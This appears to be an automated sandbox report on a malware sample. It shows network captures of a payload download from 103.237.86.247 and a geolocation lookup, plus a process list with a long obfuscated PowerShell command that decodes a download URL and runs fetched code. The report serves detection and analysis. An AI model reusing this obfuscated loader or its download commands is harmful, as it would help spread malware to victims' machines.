                  Data Raw: 36 77 4c 77 76 6e 45 42 6d 37 73 51 5a 41 38 41 36 77 4a 75 46 2b 73 43 66 71 38 44 58 43 51 45 63 51 47 62 63 51 47 62 75 5a 42 4d 2b 65 5a 78 41 5a 76 72 41 6a 53 33 67 66 45 79 7a 67 42 54 63 51 47 62 63 51 47 62 67 63 46 65 66 51 5a 4b 63 51 47 62 36 77 4a 46 4f 65 73 43 61 79 31 78 41 5a 75 36 37 6b 77 72 74 48 45 42 6d 2b 73 43 62 4b 76 72 41 6a 34 37 63 51 47 62 4d 63 72 72 41 6c 79 51 36 77 4b 50 54 6f 6b 55 43 2b 73 43 32 5a 78 78 41 5a 76 52 34 6e 45 42 6d 2b 73 43 6e 57 47 44 77 51 52 78 41 5a 74 78 41 5a 75 42 2b 62 42 2b 75 51 46 38 79 33 45 42 6d 2b 73 43 31 66 53 4c 52 43 51 45 36 77 4b 48 4d 2b 73 43 55 4f 79 4a 77 2b 73 43 49 2f 74 78 41 5a 75 42 77 33 75 64 51 67 42 78 41 5a 76 72 41 75 33 5a 75 74 36 61 74 6e 4e 78 41 5a 76 72 41 6b 42 52 67 66 49 69 49 42 53 54 36 77 4b 75 45 4f 73 43 42 42 69 42 38 76 79 36 6f 75 44 72 41 73 31 45 63 51 47 62 63 51 47 62 36 77 4b 50 66 33 45 42 6d 2b 73 43 37 78 79 4c 44 42 42 78 41 5a 74 78 41 5a 75 4a 44 42 50 72 41 71 50 46 36 77 4a 42 67 55 [TRUNCATED]
                  Data Ascii: [removed]
                  Jul 2, 2024 07:48:56.319960117 CEST | 1236 | IN | Data Raw: 71 32 52 66 36 4f 4d 4f 52 6b 48 6a 2b 45 59 4b 71 32 52 66 79 31 56 6a 33 59 46 54 6f 78 37 4e 37 59 69 39 61 32 4f 69 6e 73 33 74 71 77 73 47 38 2f 68 47 55 55 4f 6f 53 32 51 35 70 41 59 44 66 6f 32 4d 44 62 4d 76 68 6c 33 37 74 46 58 6a 37 43
                  Data Ascii: q2Rf6OMORkHj+EYKq2Rfy1Vj3YFTox7N7Yi9a2Oins3tqwsG8/hGUUOoS2Q5pAYDfo2MDbMvhl37tFXj7Cd5t2QMQWjrBch+ZhxBYNGIPHW3N9Il9Uri4zgXwYVQbB4N67MHpaeMA7iQTRTVuWxh7ZtMG3VL9Fvlc+PeDeu8EdjQCh4d67xBoxQD210TR+a9q7HmhD90Th3ujBIDa31uXeMgCl5k6sgoy/RbJlskXh3jq+EQYkE
                  Jul 2, 2024 07:48:56.319972038 CEST | 1236 | IN | Data Raw: 41 56 34 69 46 66 4f 79 33 72 65 42 53 66 62 30 49 65 66 73 79 55 64 77 62 64 5a 41 66 69 77 52 61 45 41 53 67 61 4f 45 79 74 6c 5a 4b 2f 52 57 68 62 49 30 58 68 33 75 7a 36 52 70 35 41 71 32 41 78 43 54 6b 4e 43 54 71 79 50 78 6e 71 4c 32 41 70
                  Data Ascii: AV4iFfOy3reBSfb0IefsyUdwbdZAfiwRaEASgaOEytlZK/RWhbI0Xh3uz6Rp5Aq2AxCTkNCTqyPxnqL2ApkEC+o+3ZaDiye3zmaDjrQcQ40CgaWunk0TsnYEGKEoBKxpXec/KsWl5n1IOTIxYf/hW/XkIJvogFQoqMfsQXxgCTMV9NWjBarhZ9V1hE0kOCtpLYhXwDn1jO3Uo6u6NH7BC6uD6Vv1cm/+Deu/6s8mq+smVu7F7PO
                  Jul 2, 2024 07:48:56.320040941 CEST | 1236 | IN | Data Raw: 54 76 48 7a 71 79 4f 63 6b 46 6c 72 64 43 4d 71 50 67 34 43 5a 39 4d 61 36 6f 75 4e 6f 35 43 5a 39 48 4a 42 62 76 38 53 53 41 6f 62 33 72 43 6d 41 79 56 52 6b 39 38 30 55 71 2f 44 70 77 50 54 57 42 52 50 77 33 6d 38 56 67 51 34 64 62 61 42 74 6c
                  Data Ascii: TvHzqyOckFlrdCMqPg4CZ9Ma6ouNo5CZ9HJBbv8SSAob3rCmAyVRk980Uq/DpwPTWBRPw3m8VgQ4dbaBtlO+TMZAm6ReFmhl/ty+37rFO7MWAo3WRlVzqrv3/Xa2Aodk75EejZaD2ydnznQz7n6mFqTw4JXU3GxG3zIJpCZLdScfL5P1C1dC3volY4t4drR5mh7TK2tbclVlAGYY4vKd3EHju4HmUj5XBE0Drt5HnPegrRurL/3
                  Jul 2, 2024 07:48:56.320056915 CEST | 896 | IN | Data Raw: 4d 71 6d 6b 77 41 44 77 77 6b 47 5a 35 71 4f 79 51 49 66 5a 35 37 78 42 63 4a 61 7a 78 45 30 62 70 61 44 39 36 37 52 56 4f 6c 64 70 58 43 34 64 4b 2f 58 4d 54 45 64 6a 59 59 72 61 41 6c 34 49 76 63 33 54 6d 42 2b 61 73 58 6b 64 74 43 71 2b 74 67
                  Data Ascii: MqmkwADwwkGZ5qOyQIfZ57xBcJazxE0bpaD967RVOldpXC4dK/XMTEdjYYraAl4Ivc3TmB+asXkdtCq+tgvlnWqzlh/nxJfiGRYBgzGfUJ6/1Ox1XV1P2Z35/r6LuMuY50YqBwQPNkI/i2QjKi4NkmwTOiqNnj/CgIe3kaq/YN4WNzA9O8foZO/hzLlbNlK+Qj2BzjE7Nk+ZLQIzqva2c1gmA0A1lC6+jZaD26VnzmcT/qiLzMP
                  Jul 2, 2024 07:48:56.577244997 CEST | 1236 | IN | Data Raw: 79 4f 58 64 51 56 7a 6a 69 6f 37 56 6a 78 75 76 41 55 52 2f 4f 64 42 65 64 41 38 4a 37 79 50 74 74 43 38 30 51 41 62 46 30 33 49 38 4e 72 79 78 54 57 4e 34 56 53 62 49 61 6a 34 53 31 35 31 32 4c 48 69 54 66 55 50 52 52 66 6a 32 46 76 65 54 41 74
                  Data Ascii: yOXdQVzjio7VjxuvAUR/OdBedA8J7yPttC80QAbF03I8NryxTWN4VSbIaj4S1512LHiTfUPRRfj2FveTAt7t9KJuHeu/BzXVZsvnnL0C9SbOsuAQNvKeQAjGXG0lC9G6iTw80gS/zhBPov/bVJVFZ5vGDqn7gyl4oWWgrHfWhfSLVso7XEEvVloYxfSM7m4+vEIqJjJqSMJ8wD16HY2Q3GRsau70WjcEnugxcbUsoI/pMgEB2IQ
                  Jul 2, 2024 07:48:56.577287912 CEST | 1236 | IN | Data Raw: 7a 4f 63 72 4c 53 57 41 74 75 2b 58 48 42 71 75 67 6f 6d 6a 4c 4e 50 5a 73 74 66 73 32 79 38 70 59 71 5a 30 4a 67 6c 54 72 53 46 72 52 46 50 2b 36 37 52 65 46 2f 45 30 51 59 6d 2b 6a 2f 52 78 51 4c 51 66 47 72 70 74 4e 4a 54 6f 57 31 48 34 67 4a
                  Data Ascii: zOcrLSWAtu+XHBqugomjLNPZstfs2y8pYqZ0JglTrSFrRFP+67ReF/E0QYm+j/RxQLQfGrptNJToW1H4gJW8ebOrP7BiC5Lfs0o1cew+sJnnFrsBlJSlqypFLczQOlROBfd0UFPFcRkTEIxFq2nWQl+bHFq+TEF50G4FZffcwELMdKJubkReHeLO/DiZG0nhI+m+mj18WrGT6E4N67N+CFbcRUH7pF4ah/ynQShTtIMACwd7Mpc
                  Jul 2, 2024 07:48:56.577301025 CEST | 448 | IN | Data Raw: 31 42 61 69 53 48 34 5a 59 37 33 55 2f 4f 32 68 37 66 35 77 39 2b 51 61 6c 75 62 52 32 6a 39 35 61 76 2b 74 31 54 49 50 51 64 74 49 48 70 2f 34 42 44 6e 62 70 67 4c 45 6c 6e 53 6b 38 36 74 2b 68 62 79 63 6c 67 4c 4b 57 2b 48 6a 77 79 58 79 74 6c
                  Data Ascii: 1BaiSH4ZY73U/O2h7f5w9+QalubR2j95av+t1TIPQdtIHp/4BDnbpgLElnSk86t+hbyclgLKW+HjwyXytlNc3lUCuGKbktR7aE685kUbpF4Vc+3eDeu/16s61C7hmJxuHeu+RNizpHkFtF1zVplgfAJWYl/wWZCIFZ/obU02bifxK3vxsO0NxQb2d4d1IKLh9SPhujzm9PXLKjusV79dQJiVrskhddTb57QUqC7dwRluvCUj3Bd
                  Jul 2, 2024 07:48:56.577353954 CEST | 1236 | IN | Data Raw: 70 32 43 47 6c 37 34 75 4a 65 46 5a 76 76 4b 2f 33 48 4e 50 71 4d 53 65 59 4e 4a 33 4e 49 68 6e 75 35 6f 41 59 57 2f 38 59 4a 61 6e 64 69 66 54 69 41 50 6f 36 37 6a 6a 44 41 65 64 2b 37 52 62 4a 6c 36 69 44 55 59 6a 71 32 50 49 55 4e 5a 32 41 64
                  Data Ascii: p2CGl74uJeFZvvK/3HNPqMSeYNJ3NIhnu5oAYW/8YJandifTiAPo67jjDAed+7RbJl6iDUYjq2PIUNZ2Ad5d6cvzJ2OhSwCgV2qqN9xJWoS4Y6Yu07imIEbj2uu61yfHWvzFTGGuMHM5+/HmhTHUTh3jK8sFU24+Deuy3dWuEnCC67ReEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                  Jul 2, 2024 07:48:56.577366114 CEST | 1236 | IN | Data Raw: 65 33 50 38 69 76 58 74 42 45 4d 78 6c 66 56 4e 39 30 5a 45 4c 45 44 6b 42 32 78 6a 71 4a 42 4f 32 6d 75 63 58 45 46 70 46 59 76 37 6c 66 54 4b 4a 45 51 35 30 57 66 56 64 59 54 4e 70 44 67 6f 53 66 78 31 42 72 75 70 4c 47 34 72 6e 4f 52 6e 34 4a
                  Data Ascii: e3P8ivXtBEMxlfVN90ZELEDkB2xjqJBO2mucXEFpFYv7lfTKJEQ50WfVdYTNpDgoSfx1BrupLG4rnORn4Jyg7l5rhMgeKx24cWDizpFfY82PeIX5eWyD+purg+lb5fTJN65pgSamNEROHe6/0scjWV1N8FClvz3s4htDJNfSOPWdhwuvUyp0TENQ42iqca2aCMzJy6jUiFxLl5tXROvoy4qRNlLwqjaUl2htMblHlfxNX6Ohqwl
                  Jul 2, 2024 07:48:56.577379942 CEST | 1236 | IN | Data Raw: 48 45 46 6c 76 39 68 79 4e 66 66 49 42 36 76 4a 7a 45 4a 6b 77 69 37 63 36 4d 4a 38 77 44 31 34 48 59 5a 51 37 4c 56 46 61 43 30 7a 6c 4b 66 73 4b 75 59 71 51 6d 55 71 57 68 2b 57 64 48 4b 56 69 59 41 72 69 79 6b 4d 45 34 6c 4b 6b 47 42 46 38 6a
                  Data Ascii: HEFlv9hyNffIB6vJzEJkwi7c6MJ8wD14HYZQ7LVFaC0zlKfsKuYqQmUqWh+WdHKViYAriykME4lKkGBF8j2A/hI2AntmS+VfxJaFvLROHeMACljgMLxd60aGskn0rUb8MaTfPOFWWN6tloP7JEfOZoMOc7blYnlxUzXW4rlbiVRvztLeW5of9WMtZ8EVNr9c0UN5Lp75MscTUgy++LPpiDn7iJBIh0YOLEHlC7ReHRNYqN2rsau


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  1 | 192.168.2.6 | 49720 | 103.237.86.247 | 80 | 1096 | C:\Program Files (x86)\Windows Mail\wab.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 2, 2024 07:49:29.693677902 CEST | 174 | OUT | GET /qOreedem137.bin HTTP/1.1
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                  Host: 103.237.86.247
                  Cache-Control: no-cache
                  Jul 2, 2024 07:49:30.665344000 CEST | 1236 | IN | HTTP/1.1 200 OK
                  Content-Type: application/octet-stream
                  Last-Modified: Mon, 01 Jul 2024 08:09:38 GMT
                  Accept-Ranges: bytes
                  ETag: "8985b948ecbda1:0"
                  Server: Microsoft-IIS/8.5
                  Date: Tue, 02 Jul 2024 05:49:25 GMT
                  Content-Length: 494656
                  Data Raw: df 56 c0 82 c9 fd 1f c5 4b b1 4f 76 89 e3 67 35 58 79 9c 1a fc 30 92 fd f1 9e 65 8b c0 ba 73 7b a6 d7 4d f4 e5 b2 44 e2 f8 02 8d 99 db 66 3c 26 8f 06 a6 5d 64 38 77 b7 a9 f7 d3 cc a2 93 50 36 00 1b 29 5a 55 1e 0a f5 b0 f2 f0 33 fe 85 0f eb 1d cf b6 f4 d7 ad 8a 32 46 69 da d7 03 9b ba ec df a5 83 58 02 36 2b e3 50 13 b4 04 e8 17 21 3a c4 9b e3 43 d7 76 a8 d9 2b 7e b6 f3 ed f8 a1 ce 17 b1 80 9b 5a c5 88 d0 a9 60 8e 7f c5 5e a1 aa 1c 8f 8d 0c 9b b0 ff 33 c0 40 40 a5 2d 63 69 5c 9c c2 bb d7 51 f1 65 6f 55 8c 7b 02 08 77 23 7d ab 33 e4 67 6b 7c 9d 25 dd 7f 5e fb de 91 b7 82 7c f1 e2 54 eb 0f 75 ba 9f 5e 18 03 d0 17 7c bb 92 c9 2c 58 48 46 81 5a b5 45 fb bd f8 18 57 25 20 be 33 1f ec a2 2e d0 c2 08 25 a5 e2 e4 b6 e7 3f e5 c9 14 2e d9 d3 1e fd 54 16 e0 02 69 95 66 e2 b1 79 bc fb a9 90 d3 b7 5f 76 a2 46 f6 0a 7b 1c a3 e8 15 29 28 03 5a 29 79 d4 2d 87 b1 be 57 42 e0 b8 14 37 e0 ce 58 fd de ec e3 ca a8 a4 77 ea 91 3d d0 b1 26 da cc 89 dd f2 87 21 c5 c7 c6 72 b8 5d 3d a7 98 3d b8 15 20 46 61 6b 5b 74 72 c0 90 [TRUNCATED]
                  Data Ascii: VKOvg5Xy0es{MDf<&]d8wP6)ZU32FiX6+P!:Cv+~Z`^3@@-ci\QeoU{w#}3gk|%^|Tu^|,XHFZEW% 3.%?.Tify_vF{)(Z)y-WB7Xw=&!r]== Fak[trA"|lZG4,VI0v5*zqb3&(|;@=O^"y`e{-z5^'LPsw9)V-fS-:o_4y8R.olbQx<?t^PHZA9ZV&tcmI6orn8SXG#&$6zm?5c{I?Q1|}tviboQg.HQ'4<n)DiI//AT3~Mu4;m2cdI6Yp#x{G<pK[^>Rf?Lud!%wyT!-BtAOiLD"n}I%j7J;&_8GS77!*RecM}fQ : -sI-T0j ?^m!,j';cC&h*kkv7<3GRM5*xEQv]GRN#'a}xXPU
                  Jul 2, 2024 07:49:30.665368080 CEST | 1236 | IN | Data Raw: 7b 99 78 cf 63 b0 dd 4e d7 62 47 61 22 59 bf 73 a6 5c a0 c9 96 c4 f1 e8 a1 98 14 92 86 51 1f 7b e5 4d b2 fe 4c 17 fa e9 51 85 61 f3 08 66 29 b0 25 eb 0d c2 2f e3 89 e4 77 ac 94 39 38 5a 40 99 1c de 21 0e 40 37 4d a7 d8 88 38 a0 fb f8 d1 bd 94 36
                  Data Ascii: {xcNbGa"Ys\Q{MLQaf)%/w98Z@!@7M86ZWtL"H@7r2|_HB8-ky)-jlT`6Vy|,l0s)0OIdSKAU$V4Gyyh'dinZFwG9Qt
                  Jul 2, 2024 07:49:30.665380001 CEST | 1236 | IN | Data Raw: 1e ea b5 e5 4e a4 54 9d 34 78 37 70 62 24 f4 1b 9f 18 4e fb 9e 11 1b 48 b8 4f 23 bf bf 70 49 d6 49 f2 c1 45 dd e3 aa 93 a0 3f 47 1a 5e 74 97 67 3f 39 76 38 bf 9f 47 d2 fa 06 67 78 52 0a c8 04 79 4c 67 cd b5 07 cf a9 48 34 8e 4a 26 21 82 82 16 7d
                  Data Ascii: NT4x7pb$NHO#pIIE?G^tg?9v8GgxRyLgH4J&!}0i|$OS}izNG}k=J%jEw?+;^2;dR@UrHQ/cfB:>.s!J!3?fo{HiSzg*-6g& G&
                  Jul 2, 2024 07:49:30.665462017 CEST | 1236 | IN | Data Raw: 0d 47 3c 02 16 c2 ea 67 fb 15 5e ca 1f 7d 65 1b c9 93 13 1a f7 e3 ad 9a a2 f1 f8 dc a6 8e b8 6c 12 8e 17 6b fd 9f 05 cc af 4c 50 f6 f8 3f 1d 2b 1d ca 5a 99 3c 15 b3 4d 07 86 7f c9 ac 79 45 18 aa 2d b0 e7 fa e5 c8 77 83 2d 59 ea d6 cb 14 ff df 8b
                  Data Ascii: G<g^}elkLP?+Z<MyE-w-Yt05S#t( Z4uzWm\3Hz9=V&D0o.mmIV%>w_w<#F#;v9MB~[sX^CY?|L_Di5=`B9Xl)
                  Jul 2, 2024 07:49:30.665474892 CEST | 896 | IN | Data Raw: de 0f 04 b1 a4 43 74 fa 82 9e 2b 4d 76 50 6d d3 e6 ce ba 3a 10 d2 5a d2 19 37 cf d8 2c af 22 38 f5 3d 60 94 39 39 e9 b5 b8 17 5e 18 a0 ec 0b 0d f8 26 b8 76 9c b2 fc cf 34 11 9d 4e 15 22 4c 66 fb b8 9b 9e 94 02 13 fa 61 c7 74 7c 5e fb 55 c5 93 8a
                  Data Ascii: Ct+MvPm:Z7,"8=`99^&v4N"Lfat|^UK/k(;HRf$K#3[`X"tH4Oe2)d\P1[}#k>Mpy@Dd*kM[m8P?t;*=O?JFkWau"RdG
                  Jul 2, 2024 07:49:30.924355984 CEST | 1236 | IN | Data Raw: 52 e2 d0 bc fa a1 d5 a6 96 c8 9f 32 bb f7 cf ad ca cb 16 1f 93 6b b2 4d 01 c7 e7 c9 3b d8 93 89 89 f7 99 d6 3b dd 62 1a 2a 7f e6 89 e4 fc 74 1d 2a d0 37 45 99 1c 5d d9 0c 32 2d 27 a5 30 be 3d a0 fb 71 d7 34 93 bd 5c 54 d4 b4 7c 68 21 5d ef 16 1b
                  Data Ascii: R2kM;;b*t*7E]2-'0=q4\T|h!]LDY4!%:.0N2GQj0_|AmDVnCupKZL'oX"aa`4g1ny,xZGu d }WvWYmD8d=
                  Jul 2, 2024 07:49:30.924396992 CEST | 1236 | IN | Data Raw: d6 d3 48 f6 f3 cb d8 1d ae a0 63 11 71 9c b3 73 54 37 bf f8 15 22 f2 78 4e 6c 2f 65 f8 89 0d 57 69 15 b3 b5 d9 c0 2e 3e 02 fd ce 95 de 7a 7f 54 c1 ad 32 03 07 d7 d5 62 27 8a c5 62 da f7 34 64 75 70 68 69 09 b2 ac 8d 1b ae 5b fa ad 89 a1 eb 52 ee
                  Data Ascii: HcqsT7"xNl/eWi.>zT2b'b4duphi[R tT]vkI% 5w:D5R&GD7&R=4ets'`8:-s8.cxp un{x(Wcx's.%C0b3&^J'
                  Jul 2, 2024 07:49:30.924410105 CEST | 1236 | IN | Data Raw: 20 d2 9b e6 7e 6c 18 4e d1 7a 97 a6 55 4a 4b e6 85 4c 05 70 dd 7c 5c 9a 27 50 be 01 64 f7 b0 af 44 4b 66 f5 97 b2 c7 ba 9e 6c 1d 75 51 70 54 b2 d5 03 18 45 72 2c db 4f 41 21 a0 6c ed 95 c5 10 65 93 27 5e f6 07 a2 9c 34 b0 0c 3c 96 39 ba 36 bb aa
                  Data Ascii: ~lNzUJKLp|\'PdDKfluQpTEr,OA!le'^4<96_hjYVjVG %_WdYS[>6,WfU:L vD#X8S2-;c5Z]Q-cJ O<X7Q{_K7Q9|\5]
                  Jul 2, 2024 07:49:30.924428940 CEST | 1236 | IN | Data Raw: f5 7c 1b fd fb a1 ce 92 66 d2 b1 ad 8e 7e 4d 03 16 67 02 0a 7f f5 49 b3 a2 6e 2d 16 eb bc 10 49 9f 6d c6 4c 8e c3 3f 2b 1d ad 96 79 7c 64 25 7d 0d 19 2c 4c 38 29 04 f5 95 04 c2 4a e5 51 a5 38 bc 0b 70 32 c0 e6 d4 27 e7 1c 85 28 0c f0 2c 8b 56 32
                  Data Ascii: |f~MgIn-ImL?+y|d%},L8)JQ8p2'(,V2""v6-}.QR*PNC4N`S+SR4,I'U$Z-(L&UPfkEE'Cs-$Kn9gvE=3~o[MA"dSZGG@,r#
                  Jul 2, 2024 07:49:30.924443007 CEST | 1236 | IN | Data Raw: fe 22 94 24 7c 70 c8 5e 07 f0 4e ca 23 da 32 fc cf 34 77 62 3b d3 3d 1a f9 94 1f 6b d9 85 3f 41 2c 87 53 84 96 31 ca 14 80 b1 e8 6c 65 a7 be 50 4c fe da c6 aa f8 4d 68 18 ad d0 f1 81 98 74 d0 1e ea 40 0b 0a ec 17 0d 97 07 87 e5 c8 4e f9 2d 18 f7
                  Data Ascii: "$|p^N#24wb;=k?A,S1lePLMht@N--d[>Jxyg!MUGCkjVYt1O2G+v^S\\v^`X;[mOK"-;x&rlBa7vW58<`T*v'<w??o^Gb1I^tF.s
                  Jul 2, 2024 07:49:30.924911022 CEST | 1120 | IN | Data Raw: c4 4f b1 b4 a6 d8 88 b3 f4 df d4 5a 77 bf fd d1 d6 7c ac 67 29 ab b1 ca 5c 43 54 05 95 88 d2 32 75 2a 93 37 7b f3 01 ef b9 82 d8 8b c5 83 72 73 0c f6 ca ed d3 28 83 78 e0 f4 8c 89 52 99 9e bd 64 a0 5f 30 07 6a f7 58 aa b8 75 a7 92 16 42 50 78 33
                  Data Ascii: OZw|g)\CT2u*7{rs(xRd_0jXuBPx3CTsqM`S,Yj]>$,\77"#E-b,V aV4"`r!Ofk<3ZZA<!#N|8s8c3#-x+IV


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  2 | 192.168.2.6 | 49723 | 178.237.33.50 | 80 | 1096 | C:\Program Files (x86)\Windows Mail\wab.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Jul 2, 2024 07:49:37.886504889 CEST | 71 | OUT | GET /json.gp HTTP/1.1
                  Host: geoplugin.net
                  Cache-Control: no-cache
                  Jul 2, 2024 07:49:38.499752998 CEST | 1170 | IN | HTTP/1.1 200 OK
                  date: Tue, 02 Jul 2024 05:49:38 GMT
                  server: Apache
                  content-length: 962
                  content-type: application/json; charset=utf-8
                  cache-control: public, max-age=300
                  access-control-allow-origin: *
                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                  Data Ascii: { "geoplugin_request":"8.46.123.33", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                  Target ID:0
                  Start time:01:48:50
                  Start date:02/07/2024
                  Path:C:\Windows\System32\wscript.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SOA.vbs"
                  Imagebase:0x7ff63b780000
                  File size:170'496 bytes
                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:2
                  Start time:01:48:52
                  Start date:02/07/2024
                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens Unblessed Assimilerings silverrod Cirsith200 Bespake Lucres Galvanography Medansvaret Trommesalsmaleri badutspringene Batwoman Journalnummeret Dobbeltkvartet Clover Coffeeroom calamiform Urophobia Kloakeringsomraaderne Electroculture Euphemist Bjergmassivernes Uhjlpeligste Stalinismens Telekommunikationens';If (${host}.CurrentCulture) {$Fightet++;}Function fyrstendmme($aldersforskellens){$Breddesekunder=$aldersforskellens.Length-$Fightet;$Energi='SUBsTRI';$Energi+='ng';For( $standsforskellenes=7;$standsforskellenes -lt $Breddesekunder;$standsforskellenes+=8){$Unblessed+=$aldersforskellens.$Energi.Invoke( $standsforskellenes, $Fightet);}$Unblessed;}function Illish($Phagedaena){ . ($Triangularize) ($Phagedaena);}$Opholdsstuernes=fyrstendmme 'Ove,logMP sternoStudentzB,throdiBasommal,ovangslCopywria rbefol/Aphidic5Blokskr.Overvaa0Duarchy Genrefo(Reser,eWDistrusiOsm.regnSpacersdcert,fioPassiarwInterjesPeckedi NydeligNMontr cTAnticle Medinde1 Overcr0elastom.Un.erfo0Renounc; Topot. Bia ricWTrimniniJetsrunnLsdelfl6Hovmodi4forrykk;Nautica stra hsxSne ker6Cohea.t4 theop.; Prster SelvcerEntase v Undres:undecor1Fejlber2Phyllos1Martial.Konkurr0Fdevand)Yawlers AbioloGFemkroneVejrm.lckommandkBemyndio Ti skr/Vaaben.2 Relati0 Fanwr 1Flugtni0Gerning0Analyse1Udmanvr0Sidetal1Lin.les Appo,ehFCyk lbaiSamekhurcalioloeMoa lesfRester o,estselxUdsp ng/ Aandev1 asiali2Tubercl1,eperso. 
drydde0 Fogf,u ';$Sorteringens=fyrstendmme 'PaakrveU Antedas Sjaelaevulkankr baga e-tjenestA.nderprgMemoryleTelak cn ndtjentDesinfi ';$Bespake=fyrstendmme 'Arthrozh Lat,setLaveslat GenbrupUdnvnel:Donnish/Telefon/Gambesm1Esquire0Aktiesm3Nonrepa. Pushie2Spag um3 Entome7Simonio. digame8 cul ee6 Mistan. Ba oni2Sawneba4porella7Rodesbl/ ClenchF BoatsirOpprioreGraagaamAndenklmBetonk,eSexol glBoghvediAf.rftegAdipsybs calceit GeodifeUlcerog.ElectroxApp,ehesAf,rydsnholden ';$Deutoxide=fyrstendmme 'Valgets>Bakteri ';$Triangularize=fyrstendmme 'UdfyldniMikalaseUforkorxReprodu ';$Doozie='Medansvaret';$Bombestoppets = fyrstendmme ' ,ulbrieUl,triccUngr.sphForretnoAfrett. Pa.gene%Becifreainex,repRuelsenpCostaladCarabaoaalk,nettPja,tesaFleshbr%tidtag.\ NonmitDSystemko Lnra,mbEkstraibScraggleBudgettlparadeftCraniomrSrsynetuThiokoldClericieSecondin Do torsHamalds1Avgusta4Hildebo0A bejds.hugtandASkoleinfUnreal.fSerpent trillin&Hilsene&B ngtow P.cocureInterfrctubi,olhArtiumsoc onebr .ustulatunmetap ';Illish (fyrstendmme ' Pixm.p$GastroegTypot kl etreado Trachob Pse.doa hrynidl La.dsd:ForsnknDMimicaleAndalusb mirska,osmolat HalefieStandtirDidrach= Nati.n(Genaabnc Derre.mSteerlidKonomi. 
Arkivk/StoreslcInsu pa Futur m$MessersBBaghaano,innaclmIndeterbSkolegaeStikkess Hopkint .oktoroPatchi pUtilregp,amsinge Dispost arinasenkelhe)Dibutyr ');Illish (fyrstendmme 'Smoking$ Re,ultgPhosph.lOutswiroCyclusgbvalenceaNo,dendlM cetoz: Bru erCagonisei S.ddelrNsevrdis LavfalisemitertFor.ftehIndkoms2 Produk0Sommerf0Renteko=Uprcise$DebentuB MormoneDronninsSynkrospSnubbisa Driv ukRadioake Aquavi.RacistesBurblinpGront elFlor.neiCha.aeptUspoken(Frstega$E.ectroDMolervreMartelbuMa.ionetSandeleoinconsuxMiljstti Madpakd kudenseUdbryde) Chaper ');Illish (fyrstendmme 'Bestraa[Se tienNVentilee Inspirt Pedime.Rr,lsevS Br.steeIndbyggrCitificvS.umkvaiAr,ejdscV,nvitteRicinelPKoleriko tndstii U.opian SutrastNormeriM,ekapitaFangernnFirmamraNephrodgAnisbole sammenr C,rkel]Snea,in: Totali:Mo finiS TytheieAmac atcTektit.uG ossopr TelestiD ellintMikraesyRefri ePUerholdrPaucispoHapsendtirrepaioPalatogc T.berioMorgenpl,atarbf Ma.ning=Bernetk Entire[ PotensNLangspyeOpfindetFromber.Jugeme,SSrkendeeSmaaforc TilsaeuCorindorBroka.ei Ilde ttOver,lyyLati,skPClive,er,orlagsoScattert Misinfohav,nenc Gledesokr.nragl ,lhambTPersienybottonhpNe rusteEpigram]Grundfl:Pi fleo:FarveskTRegnskalAutomo 